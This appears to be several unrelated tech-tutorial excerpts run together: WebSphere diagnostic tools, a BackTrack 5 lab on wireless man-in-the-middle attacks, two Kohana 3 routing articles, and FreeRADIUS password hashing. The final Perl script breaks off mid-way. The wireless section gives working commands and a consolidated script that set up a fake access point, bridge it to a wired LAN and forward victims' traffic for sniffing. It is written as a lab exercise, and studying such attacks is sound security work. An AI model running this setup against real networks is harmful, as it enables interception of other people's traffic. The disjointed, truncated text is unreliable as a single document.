To diagnose a problem, you might need to collect WAS JNDI information. WebSphere Application Server provides a utility that dumps the JNDI namespace. The dumpNameSpace.sh script dumps information about the WAS namespace and is very useful when debugging applications in which JNDI errors appear in the WAS logs. You can use this utility to dump the namespace and inspect the JNDI tree that the WAS name server (the WAS JNDI lookup service provider) is providing to applications. This tool is very useful in JNDI problem determination, for example, when debugging incorrect JNDI resource mappings, in cases where an application resource is not mapped correctly to a WAS-configured resource, or where the application is using direct JNDI lookups when it really should be using indirect lookups. For this tool to work, WAS must be running when the utility is run. To run the utility, use the following syntax:

```
./dumpNameSpace.sh -<command_option>
```

There are many options for this tool. The following list shows the command-line options available by typing <was_root>/bin/dumpNameSpace.sh -help:

- -host <host>: Bootstrap host, that is, the WebSphere host whose namespace you want to dump. Defaults to localhost.
- -port <port>: Bootstrap port. Defaults to 2809.
- -user <name>: Username for authentication if security is enabled on the server. Acts the same way as the -username keyword.
- -username <name>: Username for authentication if security is enabled on the server. Acts the same way as the -user keyword.
- -password <password>: Password for authentication, if security is enabled on the server.
- -factory <factory>: The initial context factory to be used to get the JNDI initial context. Defaults to com.ibm.websphere.naming.WsnInitialContextFactory and normally does not need to be changed.
- -root [ cell | server | node | host | legacy | tree | default ]: Scope of the namespace to dump.
  - For WAS 5.0 or later: cell is the DumpNameSpace default and dumps the tree starting at the cell root context; server dumps the tree starting at the server root context; node dumps the tree starting at the node root context (synonymous with host).
  - For WAS 4.0 or later: legacy is the DumpNameSpace default and dumps the tree starting at the legacy root context; host dumps the tree starting at the bootstrap host root context (synonymous with node); tree dumps the tree starting at the tree root context.
  - For all WebSphere and other name servers: default dumps the tree starting at the initial context which JNDI returns by default for that server type. This is the only -root choice that is compatible with WebSphere servers prior to 4.0 and with non-WebSphere name servers.

  The WebSphere initial JNDI context factory (the default) obtains the desired root by specifying a key specific to the server type when requesting an initial CosNaming NamingContext reference. The default roots and the corresponding keys used for the various server types are as follows: WebSphere 5.0 uses the server root context, the initial reference registered under the key NameServiceServerRoot on the server; WebSphere 4.0 uses the legacy root context, bound under the name domain/legacyRoot in the initial context registered on the server under the key NameService; WebSphere 3.5 and non-WebSphere servers use the initial reference registered under the key NameService on the server.
- -url <url>: The value for the java.naming.provider.url property used to get the initial JNDI context. This option can be used in place of the -host, -port, and -root options. If the -url option is specified, the -host, -port, and -root options are ignored.
- -startAt <some/subcontext/in/the/tree>: The path from the requested root context to the top-level context where the dump should begin. Recursively dumps (displays a tree-like structure of) the sub-contexts of each namespace context. Defaults to the empty string, that is, the root context requested with the -root option.
- -format [ jndi | ins ]: jndi displays name components as atomic strings; ins displays name components parsed per INS rules (id.kind). The default format is jndi.
- -report [ short | long ]: short dumps the binding name and bound object type, which is essentially what JNDI Context.list() provides; long dumps the binding name, bound object type, local object type, and string representation of the local object (that is, Interoperable Object Reference (IOR) string values, and so on, are printed). The default report option is short.
- -traceString <some.package.to.trace.*=all>: Trace string in the same format used with servers, with output going to the DumpNameSpaceTrace.out file.

Example namespace dump

To see the result of using the namespace tool, navigate to the <was_root>/bin directory on your server and type the following command.

For Linux:

```
./dumpNameSpace.sh -root cell -report short -username wasadmin -password wasadmin > /tmp/jnditree.txt
```

For Windows:

```
dumpNameSpace.bat -root cell -report short -username wasadmin -password wasadmin > c:\temp\jnditree.txt
```

The resulting jnditree.txt file contains the dumped JNDI tree produced by the command.

EAR expander

Sometimes during application debugging or automated application deployment, you may need to inquire about the contents of an Enterprise Archive (EAR) file. An EAR file is made up of one or more WAR files (web applications) and one or more Enterprise JavaBeans (EJBs), and there can be shared JAR files as well; within each WAR file, there may also be JAR files. The EARExpander.sh utility allows all artifacts to be fully decompressed, much like expanding a TAR file.

Usage syntax:

```
EARExpander -ear (name of the input EAR file for the expand operation or
                  name of the output EAR file for the collapse operation)
            -operationDir (directory to which the EAR file is expanded or
                           directory from which the EAR file is collapsed)
            -operation (expand | collapse)
            [-expansionFlags (all | war)]
            [-verbose]
```

To demonstrate the utility, we will expand the HRListerEAR.ear file. Ensure that you have uploaded the HRListerEAR.ear file to a new folder called /tmp/EARExpander on your Linux server, or an appropriate alternative location, and run the following command.

For Linux:

```
<was_root>/bin/EARExpander.sh -ear /tmp/HRListerEAR.ear -operationDir /tmp/expanded -operation expand -expansionFlags all -verbose
```

For Windows:

```
<was_root>\bin\EARExpander.bat -ear c:\temp\HRListerEAR.ear -operationDir c:\temp\expanded -operation expand -expansionFlags all -verbose
```

The result will be an expanded on-disk structure of the contents of the entire EAR file. An example of everyday use could be that EARExpander.sh is used as part of a deployment script, where an EAR file is expanded and hardcoded properties files are searched and replaced.
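As a sketch of that deployment pattern (the paths, property value, and sed expression are hypothetical):

```bash
#!/bin/sh
# Expand the EAR, fix a hardcoded property, and re-package it.
WAS_ROOT=/opt/IBM/WebSphere/AppServer

$WAS_ROOT/bin/EARExpander.sh -ear /tmp/HRListerEAR.ear \
    -operationDir /tmp/expanded -operation expand -expansionFlags all

# Replace a hardcoded hostname in every expanded properties file
find /tmp/expanded -name '*.properties' \
    -exec sed -i 's/devhost:9080/prodhost:9080/g' {} +

mkdir -p /tmp/collapsed
$WAS_ROOT/bin/EARExpander.sh -ear /tmp/collapsed/HRListerEAR.ear \
    -operationDir /tmp/expanded -operation collapse -expansionFlags all
```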
The EAR is then re-packaged using the EARExpander -operation collapse option to recreate the EAR file once the find-and-replace routine has completed. An example of how to collapse an expanded EAR file is as follows.

For Linux:

```
<was_root>/bin/EARExpander.sh -ear /tmp/collapsed/HRListerEAR.ear -operationDir /tmp/expanded -operation collapse -expansionFlags all -verbose
```

For Windows:

```
<was_root>\bin\EARExpander.bat -ear c:\temp\collapsed\HRListerEAR.ear -operationDir c:\temp\expanded -operation collapse -expansionFlags all -verbose
```

In the previous command-line examples, the expanded folder contains the expanded contents of the HRListerEAR.ear file, created when we used the expand operation previously. To collapse the files back into an EAR file, use the collapse operation, as shown above. Collapsing the EAR folders results in a file called HRListerEAR.ear, created by collapsing the expanded folder contents back into a single EAR file.

IBM Support Assistant

IBM Support Assistant (ISA) can help you locate technical documents and fixes, and discover the latest and most useful support resources available. IBM Support Assistant can be customized for over 350 products and over 20 tools, not just WebSphere Application Server. The following is a list of the current features in IBM Support Assistant:

- Search Information: Search and filter results from a number of different websites and IBM Information Centers with just one click.
- Product Information: Provides you with a page full of related resources specific to the IBM software you are looking to support. It also lists the latest support news and information, such as the latest fixes, APARs, Technotes, and other support data for your IBM product.
- Find product education and training materials: Using this feature, you can search for online educational materials on how to use your IBM product.
- Media Viewer: The media viewer allows you to search and find free education and training materials available on the IBM Education Assistant sites. You can also watch Flash-based videos, read documentation, view slide presentations, or download material for offline access.
- Automate data collection and analysis: Support Assistant can help you gather the relevant diagnostic information automatically, so you do not have to manually locate the resources that can explain the cause of an issue. With its automated data collection capabilities, ISA allows you to specify the troublesome symptom and have the relevant information automatically gathered into an archive. You can then look through this data, analyze it with the IBM Support Assistant tool, and even forward the data to IBM support. You can also generate IBM Support Assistant Lite packages for any product add-on that has data collection scripts, and then export a lightweight Java application that can easily be transferred to remote systems for remote data collection.
- Analysis and troubleshooting tools for IBM products: ISA contains tools that enable you to troubleshoot system problems. These include analyzing JVM core dumps and garbage collector data, analyzing system ports, and getting remote assistance from IBM support.
- Guided Troubleshooter: This feature provides a step-by-step troubleshooting wizard that can help you look for logs, suggest tools, or recommend steps for fixing the problems you are experiencing.
- Remote Agent technology: Remote agent capabilities, provided through the feature pack, give you the ability to perform data collection and file transfer through the workbench from remote systems.
Note that the remote agents must be installed and configured with appropriate 'root-level' access. ISA is a very detailed tool and we cannot cover every feature in this article. However, for a demonstration, we will install ISA and then update it with an add-on called the Log Analyzer, which we will use to analyze a WAS SystemOut.log file.

Downloading the ISA workbench

To download ISA you will require your IBM user ID. The download can be found at the following URL: http://www-01.ibm.com/software/support/isa/download.html. Both Windows and Linux versions are available.

BackTrack 5: Advanced WLAN Attacks

Packt
13 Sep 2011
4 min read
(For more resources on BackTrack, see here.)

Man-in-the-Middle attack

MITM attacks are probably one of the most potent attacks on a WLAN system. There are different configurations that can be used to conduct the attack. We will use the most common one: the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidentally connect to this fake access point and continue to believe that he is connected to the legitimate access point. The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces. In the following lab exercise, we will simulate this attack.

Time for action – Man-in-the-Middle attack

Follow these instructions to get started:

1. To create the Man-in-the-Middle attack setup, we will first create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm -c 11 mon0. It is important to note that airbase-ng, when run, creates an interface at0 (a tap interface). Think of this as the wired-side interface of our software-based access point mitm.
2. Let us now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless (at0) interfaces. The succession of commands used for this is:

```
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
```

3. We can assign an IP address to this bridge and check connectivity with the gateway. Please note that we could do the same using DHCP as well. We assign an IP address to the bridge interface with the command ifconfig mitm-bridge 192.168.0.199 up, and can then try pinging the gateway 192.168.0.1 to ensure we are connected to the rest of the network.
4. Let us now turn on IP forwarding in the kernel so that routing and packet forwarding happen correctly, using echo 1 > /proc/sys/net/ipv4/ip_forward.
5. Now let us connect a wireless client to our access point mitm. It automatically gets an IP address over DHCP (the server running on the wired-side gateway). The client machine in this case receives the IP address 192.168.0.197. We can ping the wired-side gateway 192.168.0.1 to verify connectivity, and we see that the host responds to the ping requests. We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine.
6. It is interesting to note that because all the traffic is being relayed from the wireless interface to the wired side, we have full control over the traffic. We can verify this by starting Wireshark and sniffing on the at0 interface.
7. Let us now ping the gateway 192.168.0.1 from the client machine. We can see the packets in Wireshark (apply a display filter for ICMP), even though the packets are not destined for us. This is the power of Man-in-the-Middle attacks!

What just happened?

We have successfully created the setup for a wireless Man-in-the-Middle attack. We did this by creating a fake access point and bridging it with our Ethernet interface. This ensured that any wireless client connecting to the fake access point would "perceive" that it is connected to the Internet via the wired LAN.
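For convenience, the whole bring-up can be collected into one script; this is a sketch assuming the same interface names and lab addressing as the exercise above:

```bash
#!/bin/sh
# MITM bring-up: fake AP bridged to the wired LAN (lab values assumed)
airbase-ng --essid mitm -c 11 mon0 &    # creates the at0 tap interface
sleep 5                                  # give airbase-ng time to create at0

brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up

echo 1 > /proc/sys/net/ipv4/ip_forward   # let the kernel forward packets
ping -c 3 192.168.0.1                    # sanity check against the gateway
```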
Have a go hero – Man-in-the-Middle over pure wireless

In the previous exercise, we bridged the wireless interface with a wired one. As we noted earlier, this is only one of the possible connection architectures for an MITM attack. There are other combinations possible as well. An interesting one uses two wireless interfaces: one creates the fake access point, and the other is connected to the authorized access point. Both interfaces are bridged, so when a wireless client connects to our fake access point, it is connected to the authorized access point through the attacker machine. Please note that this configuration requires the use of two wireless cards on the attacker laptop. Check whether you can conduct this attack using your laptop's built-in card along with an external one. This should be a good challenge!
Routing in Kohana 3

Packt
12 Sep 2011
8 min read
  (For more resources on this topic, see here.)

The reader can benefit from the previous article on Request Flow in Kohana 3.

Routing in Kohana

If you remember, the bootstrap file comes preconfigured with a default route that follows a very simple structure:

Route::set('default', '(<controller>(/<action>(/<id>)))')
    ->defaults(array(
        'controller' => 'welcome',
        'action'     => 'index',
    ));

This tells Kohana that when it parses the URL for any request, it first finds the base_url, and then the next segment will contain the controller, then the action, then an ID. These are all optional segments, with the default controller and action being set in the array. We have taken advantage of this route with other controllers, like our Profile and Messages controllers. When we visit http://localhost/egotist/profile, the route sets the controller to profile, and since no action or ID is explicitly defined in the URL, the default action of 'index' is used. When we requested http://localhost/egotist/messages/get_messages from within our Profile controller, we also followed this route; however, neither default was needed, and the route asked for the Messages controller and its get_messages action.

In our Profile controller, we are only using one array of example messages to test functionality and the expected behavior of our application. When we implement a data store and have multiple users with profiles in our application, we will need a way to decipher which profile a user wants to see. Because the default route already has an available parameter for ID, we can use it to pass an ID to our Profile controller's index action, and have the Messages controller then find the proper messages for that user.

Time for action – Making profiles dynamic using ID

Once a database is tied to our application, and more than one user has a profile, we will need some way of knowing which profile to display. A simple and effective way to do this is to pass a user ID in the route, and have our controller use that ID to find the right messages for the right user. Let's add some more test data to our messages system, and use an ID to display the right messages.

1. Open the Profile controller, named profile.php, in our application/classes/controller/ directory. Since the action_index() method is the controller action that is called when a profile is viewed, we will need to edit it to look for the ID parameter in the URI, like this:

public function action_index()
{
    $content = View::factory('profile/public')
        ->set('username', 'Test User')
        ->bind('messages', $messages);
    $id = (int) $this->request->param('id');
    $messages_uri = "messages/get_messages/$id";
    $messages = Request::factory($messages_uri)->execute()->response;
    $this->template->content = $content;
}

2. Now we are retrieving the ID from the route and passing it along in our request to the Messages controller. This means that class must also be updated. Open the messages.php file located in application/classes/controller/ and modify its action_get_messages() method as follows:

public function action_get_messages()
{
    $id = (int) $this->request->param('id');
    $messages = array(
        1 => array(
            'This is test message one for user 1',
            'This is test message two for user 1',
            'This is test message three for user 1'
        ),
        2 => array(
            'This is test message one for user 2',
            'This is test message two for user 2',
            'This is test message three for user 2'
        )
    );
    $messages = array_key_exists($id, $messages) ? $messages[$id] : NULL;
    $this->request->response = View::factory('profile/messages')
        ->set('messages', $messages);
}

3. Open the page http://localhost/egotist/profile/index/2/ to see the messages for user 2. Browsing to http://localhost/egotist/profile/index/1/ will show the messages for user 1, that is, the test messages placed in the messages array under key 1.

What just happened?

At the very beginning of the index action in our Profile controller, we set our $id variable by getting the ID parameter from the route. Since Kohana has parsed our route for us, we can now access these parameters via the request object's param() method. Once we got the ID, we created and executed the request for the Messages controller's get_messages action, and passed the ID to that method for it to use. In the Messages controller, we used the same method to extract the ID from the request, and then used that ID to determine which messages from the messages array to display.

Although this works fine for illustrating routing for these two users, the code is far from ready, even without a data store or real user data, but it does show how the parameters can be read and used. Because most of the functionality in the controller will be replaced with our database and more precise data being passed around, we can overlook the incompleteness of the current controller actions, and begin looking at creating a URL that is better looking than http://localhost/egotist/profile/index/2/ for finding a user profile by ID.

Creating friendly URLs using custom routes

Consider how nice it would be if our users could browse to a profile without putting 'index' in the action portion of the URI, like this: http://localhost/egotist/profile/2. This looks much more pleasing, and is more in line with what we would like our URLs to look like in web apps. It is in fact very easy to have Kohana use a route to remove the index action from the URI. Routes not only make our URLs more pleasing and descriptive, but they make our application easier to maintain in the long run. We have more control over where our users are being directed based on how the URL is constructed, without having to create controller actions designed to handle routing.

Time for action – Creating a custom route

So far, we have been using the default route that is in our application bootstrap. As our application grows, so will the number of available 'starting points' for our users' requests. Not every controller, action, or parameter has to comply with the default route, and this gives us a lot of flexibility and freedom. We can add a custom route to handle user profiles by adding it to our bootstrap.php file.

1. Open the bootstrap.php file located in the application/ directory and modify the routes block so it looks like this:

/**
 * Set the routes. Each route must have a minimum of a name, a URI,
 * and a set of defaults for the URI.
 */
Route::set('profile', 'profile/<id>')
    ->defaults(array(
        'controller' => 'profile',
        'action'     => 'index',
    ));

Route::set('default', '(<controller>(/<action>(/<id>)))')
    ->defaults(array(
        'controller' => 'welcome',
        'action'     => 'index',
    ));

2. Now we can view the profile pages without having to pass the index action in the URL. Open http://localhost/egotist/profile/2 in a browser. Browsing to profiles with a more friendly URL is made possible through Kohana's routes.

What just happened?

By setting routes using the Route::set() static method, we are essentially creating filters that will be used to match requests with routes.
We can name these routes; in this case we have one named default and one named profile. Kohana uses the second parameter of the set() method to compare against the requested URI, and will call the first route that matches the request. Because it uses the first route that matches, the order in which routes are defined is very important: if we put the default route before the profile route, the profile route would never be used, as the default route would always match first. Because Kohana simply looks for a match, it does not use discretion when determining the right route for a request. So if we browse to http://localhost/egotist/profile/index/2, we will be directed through the default route and get the same result. The default route may not be available for all the routes we create in the future, so we should create routes that are as explicit as possible for our needs. Right now, our application assumes that any data passed after a controller segment named 'profile' must be the ID we are looking for. In our current application setup, we only need digits: if a user passes non-numeric data for the ID parameter, we do not want that request to match this route. This can be accomplished easily inside the Route::set() method.
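As a sketch of how this could look, Kohana 3's Route::set() accepts an optional third parameter: an array of regular expressions keyed by segment name, which a URI segment must match for the route to apply. The '\d+' pattern below is our assumption for an all-digits ID; it is not code from the original text:

Route::set('profile', 'profile/<id>', array('id' => '\d+'))
    ->defaults(array(
        'controller' => 'profile',
        'action'     => 'index',
    ));

With this constraint in place, a request such as /profile/abc no longer matches the profile route, and falls through to the default route instead.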
Request Flow in Kohana 3

Packt
12 Sep 2011
12 min read
  (For more resources on this topic, see here.)

The reader can benefit from the previous article on Routing in Kohana 3.

Hierarchy is King in Kohana

Kohana is layered in more ways than one. First, it has a cascading filesystem: the framework loads files for each of its core parts in a hierarchical order, which is explained in more detail in just a bit. Next, Kohana allows controllers to initiate requests, making the application workflow follow a hierarchical design pattern. These features are the foundation of HMVC, which is essentially a cascading filesystem, flexible routing and request handling, and the ability to execute sub-requests, combined with a standard MVC pattern.

The framework manages locating and loading the right file by using a core method named Kohana::find_file(). This method searches the filesystem in a predetermined order to load the proper class first. The order the method searches in is (with default paths):

1. Application path (/application)
2. Modules (/modules), as ordered in bootstrap.php
3. System path (/system)

Cascading filesystem

As the framework loads, it creates a merged filesystem based on the loading order described above. One of the benefits of loading files this way is the ease with which we can overload classes that would be loaded later in the flow. We never have to, nor should we, alter a file in the system directory: we can override the default behavior of any method by overloading it in the application directory. Another great advantage is the consistency this mechanism offers. We know the exact load order for every class in any application, making it much easier to create custom code and know exactly where it needs to live.

When an example application is merged into the final file structure used to complete a request, classes in the application layer can override files in the modules. Modules extend and enhance the framework by building on the system core; our application then sits on top of the system and module files, and can build on and extend the functionality of the module and system layers. Kohana also makes it easy to load third-party libraries, referred to as vendor libraries, into the filesystem.

Each of the three layers has five basic folders into which Kohana looks:

- Classes (/classes) contain all autoloaded class files. This directory includes our controllers, models, and their supporting classes. Autoloading allows us to use classes without having to include them manually: any class inside this directory will automatically be searched for and loaded when it is used.
- Config files (/config) are files containing arrays that can be parsed and loaded using the core method Kohana::config(). Some config files are required to configure and properly load modules, while others may be created by us to make our application easier to maintain, or to keep vendor libraries tidy by moving config data into the framework. Config files are the only files in the cascading filesystem that are not overloaded; all config files are merged with their parent files.
- Internationalization files (/i18n) make it much easier to create language files that work with our applications to deliver the content that best suits the language of our users.
- Messages (/messages) are much like configuration files, in that they are arrays loaded by a core Kohana method: Kohana::message() parses and returns the messages for a specific array. This functionality is very useful when creating forms and actions for our applications.
- View files (/views) are the presentation layer of our applications, where view files and template files live.

Request flow in Kohana

Now that we have seen how the framework merges files to create the set of files to load on request, this is a good place to look at the flow of a request through Kohana. Remember that controllers can invoke requests, creating a bit of a loop between controllers, models, and views, but the framework always runs in the same order, beginning with the index.php file.

The index.php file sets the paths to the application, modules, and system directories and saves them as constants that are defined for global use. These constants are APPPATH, MODPATH, and SYSPATH, and they hold the application, modules, and system paths respectively. After the error-reporting levels are set, Kohana looks to see if the install.php file exists. If the install file is not found, Kohana takes the next step in loading the framework by loading the core Kohana class. Next, the index file looks for the application's Kohana class, first in the application directory, then in the system path. This is the first example of Kohana looking for our files before it looks for its own. The last thing the index file does is bootstrap our application, by requiring the bootstrap.php file and loading it.

You probably remember having to configure the bootstrap file when we installed Kohana. This is the file in which we set our base URL and modules; however, it is a bit more important than just basic installation and configuration. The bootstrap begins by setting some basic environment settings, like the default timezone and locale. Next, it enables the autoloader, and defines the application environment; this tells the framework whether our application is in a production or development environment, allowing it to make decisions based on environment-specific settings. Next, the default options are set and Kohana is initialized, with the Kohana::init() method being called.

After Kohana's initialization, the bootstrap sets up logging, configuration reading, and then modules. Modules are defined using an array, with the module name as the key and the path to the module as the value. The module load order is as listed in this array, and modules are all subject to the same rules and conventions as core and application code. Each module is added to the cascading filesystem as described above, allowing its files to override any that may be added later when the system files are merged. Modules can contain their own init files, named init.php, that act similar to the application bootstrap, adding routes specific to the module for our application to use.

The last thing the bootstrap does in a normal request flow is set the routes for the application. Kohana ships with a default route that loads the index action in the welcome controller. The Route object's set() method accepts an array that defines the name, URI, and defaults for the parameters set in the URI. By setting default controllers, actions, and params, we can have dynamic URLs that have default values if none are passed. If no controller or action is passed in the URI on a vanilla Kohana install, the welcome controller will be loaded and the index action invoked, as outlined in the array passed to the Route::set() method in the bootstrap.
Once all the application routes are set via the Route::set() method and the init.php files residing in modules, Request::instance() is invoked, setting the request loop into action. As the Request object processes the request, it looks through the routes until it finds the right controller to load. The Request object then instantiates the controller, passing the request to the controller for it to use.

The Controller::before() method is then called, which acts much like a constructor. By being called first, the before() method allows any logic that needs to be performed before a controller action to execute. Once the before() method is complete, the object continues to load the requested functions, just as when a constructor has completed. The controller action, a method in the controller class, is then called, and once complete, it returns the request response. The action method is where the business logic for the request resides. Once the action is complete, the Controller::after() method is called, much like the destructor of a standard PHP class.

Because of the hierarchical structure of Kohana, any controller can initiate a new request, making it possible for other controllers to be loaded, invoking more controller actions, which generate request responses. Once all the requests have been fulfilled, Kohana renders the final request response.

The Kohana request flow can seem long and complex, but it can also be seen as very clean and organized. By using a front controller design pattern, all requests are handled by just one file: index.php. Each and every request handled by our applications begins with this one file. From there the application is bootstrapped, and then the controller designed to handle the specific request is found, executed, and its response displayed. Although, as we have seen, more is happening under the hood, for most of our applications this simple way of looking at the request flow makes it easy to create powerful web applications using Kohana.

Using the Request object

The request flow in Kohana is interesting, and it is easy to see how it can be powerful at a high level, but the best way to understand HMVC and routing in Kohana is to look at some actual code and see the resulting outcome for real-world scenarios. Kohana's Request object determines the proper controller to invoke, and acts as a wrapper for the response. If we look at the Template Controller that we are extending in our Application Controller for the case study site, we can follow the inheritance path back to Kohana's template controller and see the request response. One of the best ways to understand what is happening inside the framework is to drill down through the filesystem and look at the actual code; one of the great advantages of open source frameworks is the ability to read the code that makes the library run.

Opening the welcome controller, located at application/classes/controller/welcome.php, we see the following class declaration:

class Controller_Welcome extends Controller_Application

The first thing we see in the base controller class is that it extends another controller, and then we see the declaration of an object property named $request. This variable holds the Kohana_Request object, the class that created the original controller call. In the constructor, we can see that the Kohana_Request object is type-hinted in the argument list, and that it sets the $request object property on instantiation. All that is left in the base Controller class is the before() and after() methods, with no functionality.

We can then open our Application Controller, located at application/classes/controller/application.php. The class declaration in this controller looks like this:

abstract class Controller_Application extends Controller_Template

In this file, we can see the before() method loading the template view into the template variable, and in the after() method, we see the Request object ($this->request) having its response body set, ready to be rendered. This class, in turn, extends the Template Controller.

The Template Controller is part of the Kohana system. Since we have not overridden the template controller in our application or modules, the original template controller that ships with Kohana is being loaded. It is located at system/classes/controller/template.php. The class declaration in this controller looks like:

abstract class Controller_Template extends Kohana_Controller_Template

Here things take a twist, and for the first time we have to leave the /classes/controller/ structure to find an inherited class. The Kohana_Controller_Template class lives in system/classes/kohana/controller/template.php. The class is fairly short and simple, and it has this class declaration:

abstract class Kohana_Controller_Template extends Controller

This controller (system/classes/controller.php) is the base controller that all requested controller classes must extend. Examining this class lets us see the Request class enter the controller loop, and the template view get sent to the Request object as the response. Walking through the Welcome Controller's heritage is a great way of seeing how the Request object loads a controller, and how the parent classes all contribute to the request flow in Kohana. It may seem like pointless complexity at first; however, the benefits of transparent extension are very powerful, and Kohana makes the mechanisms work behind the scenes.

But one question still remains: how is the Request object aware of the controllers and routes? Although dissecting Kohana's Request class could be an article unto itself, a lot can be answered by looking at the constructor in the system/classes/kohana/request.php file. The constructor is given the URI, and then stores the object properties that the object will later use to execute the request. The Request class also has a couple of key methods that can be very helpful: the first is Request::controller(), which returns the name of the controller for the request, and the other is Request::action(), which similarly returns the name of the action for the request. After loading the routes, the constructor iterates through them, determines any matches for the URI, and begins setting the controller, action, and parameters for the route. If there are no matches for optional segments of the route, the defaults are stored in the object properties.

When the Request object's execute() method is called, the request is processed and the response returned. This happens by first processing the before() method, then the controller action being requested, then the after() method for the class, followed by any other requests until all have completed. The topic of initiating a request from within a controller has arisen a few times, and is the best way to illustrate the hierarchical aspect of HMVC. Let's take a look at this process by creating a controller method that initiates a new request, and see how it completes.
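As a minimal sketch of what such a method could look like (the action name and URI below are illustrative assumptions following the egotist examples from the routing article, not code from the original text):

public function action_dashboard()
{
    // Hierarchical request: from inside one controller action, dispatch a
    // second, internal request to another controller and capture its output.
    $latest = Request::factory('messages/get_messages/1')
        ->execute()
        ->response;

    // Use the sub-request's rendered response as part of this action's view
    $this->template->content = $latest;
}

When action_dashboard() runs, the outer request waits while the inner request goes through the same route matching, before(), action, and after() cycle described above, and its response is handed back to the calling controller.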
Storing Passwords Using FreeRADIUS Authentication

Packt
08 Sep 2011
6 min read
In the previous article we covered the authentication methods used while working with FreeRADIUS. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches methods for storing passwords and how they work. Passwords do not need to be stored in clear text; it is better to store them in a hashed format. There are, however, limitations to the kinds of authentication protocols that can be used when the passwords are stored as a hash, which we will explore in this article.

(For more resources on this subject, see here.)

Storing passwords

Username and password combinations have to be stored somewhere. The following list mentions some of the popular places:

- Text files: You should be familiar with this method by now.
- SQL databases: FreeRADIUS includes modules to interact with SQL databases. MySQL is very popular and widely used with FreeRADIUS.
- Directories: Microsoft's Active Directory or Novell's eDirectory are typical enterprise-size directories. OpenLDAP is a popular open source alternative.

The users file and the SQL database that can be used by FreeRADIUS store the username and password as AVPs. When the value of this AVP is in clear text, it can be dangerous if the wrong person gets hold of it. Let's see how this risk can be minimized.

Hash formats

To reduce this risk, we can store the passwords in a hashed format. A hashed format of a password is like a digital fingerprint of that password's text value. There are many different ways to calculate this hash, for example MD5 or SHA1. The end result of a hash should be a one-way, fixed-length encrypted string that uniquely represents the password. It should be impossible to retrieve the original password out of the hash.

To make the hash even more secure and more immune to dictionary attacks, we can add a salt to the function that generates the hash. A salt is randomly generated bits to be used in combination with the password as input to the one-way hash function. With FreeRADIUS we store the salt along with the hash; it is therefore essential to have a random salt with each hash to make a rainbow table attack difficult. Both the MD5 and SHA1 hash functions can be used with a salt to make them more secure. The pap module, which is used for PAP authentication, can authenticate users against passwords stored in several hash formats, including the Crypt, MD5, and SMD5 formats we create below.

Time for action – hashing our password

We will replace the Cleartext-Password AVP in the users file with a more secure hashed password AVP in this section. There seems to be general confusion about how the hashed password should be created and presented; we will help you clarify this issue in order to produce working hashes for each format. A valuable URL to assist us with the hashes is the OpenLDAP FAQ: http://www.openldap.org/faq/data/cache/419.html. There are a few sections there that show how to create different types of password hashes, and we can adapt them for our own use in FreeRADIUS.

Crypt-Password

Crypt password hashes have their origins in Unix computing. Stronger hashing methods are preferred over crypt, although crypt is still widely used.

1. The following Perl one-liner will produce a crypt password for passme with the salt value of 'salt':

#> perl -e 'print(crypt("passme","salt")."\n");'

2. Use this output and change Alice's check entry in the users file from:

"alice" Cleartext-Password := "passme"

to:

"alice" Crypt-Password := "sa85/iGj2UWlA"

3. Restart the FreeRADIUS server in debug mode. Run the authentication request against it again.

4. Ensure that pap now uses the crypt password by looking for the following line in the FreeRADIUS debug feedback:

[pap] Using CRYPT password "sa85/iGj2UWlA"

MD5-Password

The MD5 hash is often used to check the integrity of a file. When downloading a Linux ISO image you are also typically supplied with the MD5 sum of the file, and you can confirm the integrity of the file by using the md5sum command. We can also generate an MD5 hash from a password. We will use Perl to generate and encode the MD5 hash in the correct format required by the pap module. The creation of this password hash involves external Perl modules, which you may have to install before the script can be used. The following steps will show you how:

1. Create a Perl script with the following contents; we'll name it 4088_04_md5.pl:

#!/usr/bin/perl -w
use strict;
use Digest::MD5;
use MIME::Base64;
unless ($ARGV[0]) {
    print "Please supply a password to create a MD5 hash from.\n";
    exit;
}
my $ctx = Digest::MD5->new;
$ctx->add($ARGV[0]);
print encode_base64($ctx->digest, '') . "\n";

2. Make the 4088_04_md5.pl file executable:

chmod 755 4088_04_md5.pl

3. Get the MD5 password for passme:

./4088_04_md5.pl passme

4. Use this output and update Alice's entry in the users file to:

"alice" MD5-Password := "ugGBYPwm4MwukpuOBx8FLQ=="

5. Restart the FreeRADIUS server in debug mode. Run the authentication request against it again.

6. Ensure that pap now uses the MD5 password by looking for the following line in the FreeRADIUS debug feedback:

[pap] Using MD5 encryption.

SMD5-Password

This is an MD5 password with salt. The creation of this password hash also involves external Perl modules, which you may have to install before the script can be used.

1. Create a Perl script with the following contents; we'll name it 4088_04_smd5.pl:

#!/usr/bin/perl -w
use strict;
use Digest::MD5;
use MIME::Base64;
unless (($ARGV[0]) && ($ARGV[1])) {
    print "Please supply a password and salt to create a salted MD5 hash from.\n";
    exit;
}
my $ctx = Digest::MD5->new;
$ctx->add($ARGV[0]);
my $salt = $ARGV[1];
$ctx->add($salt);
print encode_base64($ctx->digest . $salt, '') . "\n";

2. Make the 4088_04_smd5.pl file executable:

chmod 755 4088_04_smd5.pl

3. Get the SMD5 value for passme using a salt value of 'salt':

./4088_04_smd5.pl passme salt

Remember that you should use a random value for the salt; we only used 'salt' here for the demonstration.

4. Use this output and update Alice's entry in the users file to:

"alice" SMD5-Password := "Vr6uPTrGykq4yKig67v5kHNhbHQ="

5. Restart the FreeRADIUS server in debug mode. Run the authentication request against it again.

6. Ensure that pap now uses the SMD5 password by looking for the following line in the FreeRADIUS debug feedback:

[pap] Using SMD5 encryption.
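The same pattern extends to salted SHA1 (SSHA) hashes, which the pap module can also verify (check the rlm_pap documentation for your version). The script below is a sketch adapted from the SMD5 script above, not part of the original text, and assumes the Digest::SHA1 Perl module is installed:

#!/usr/bin/perl -w
use strict;
use Digest::SHA1;
use MIME::Base64;
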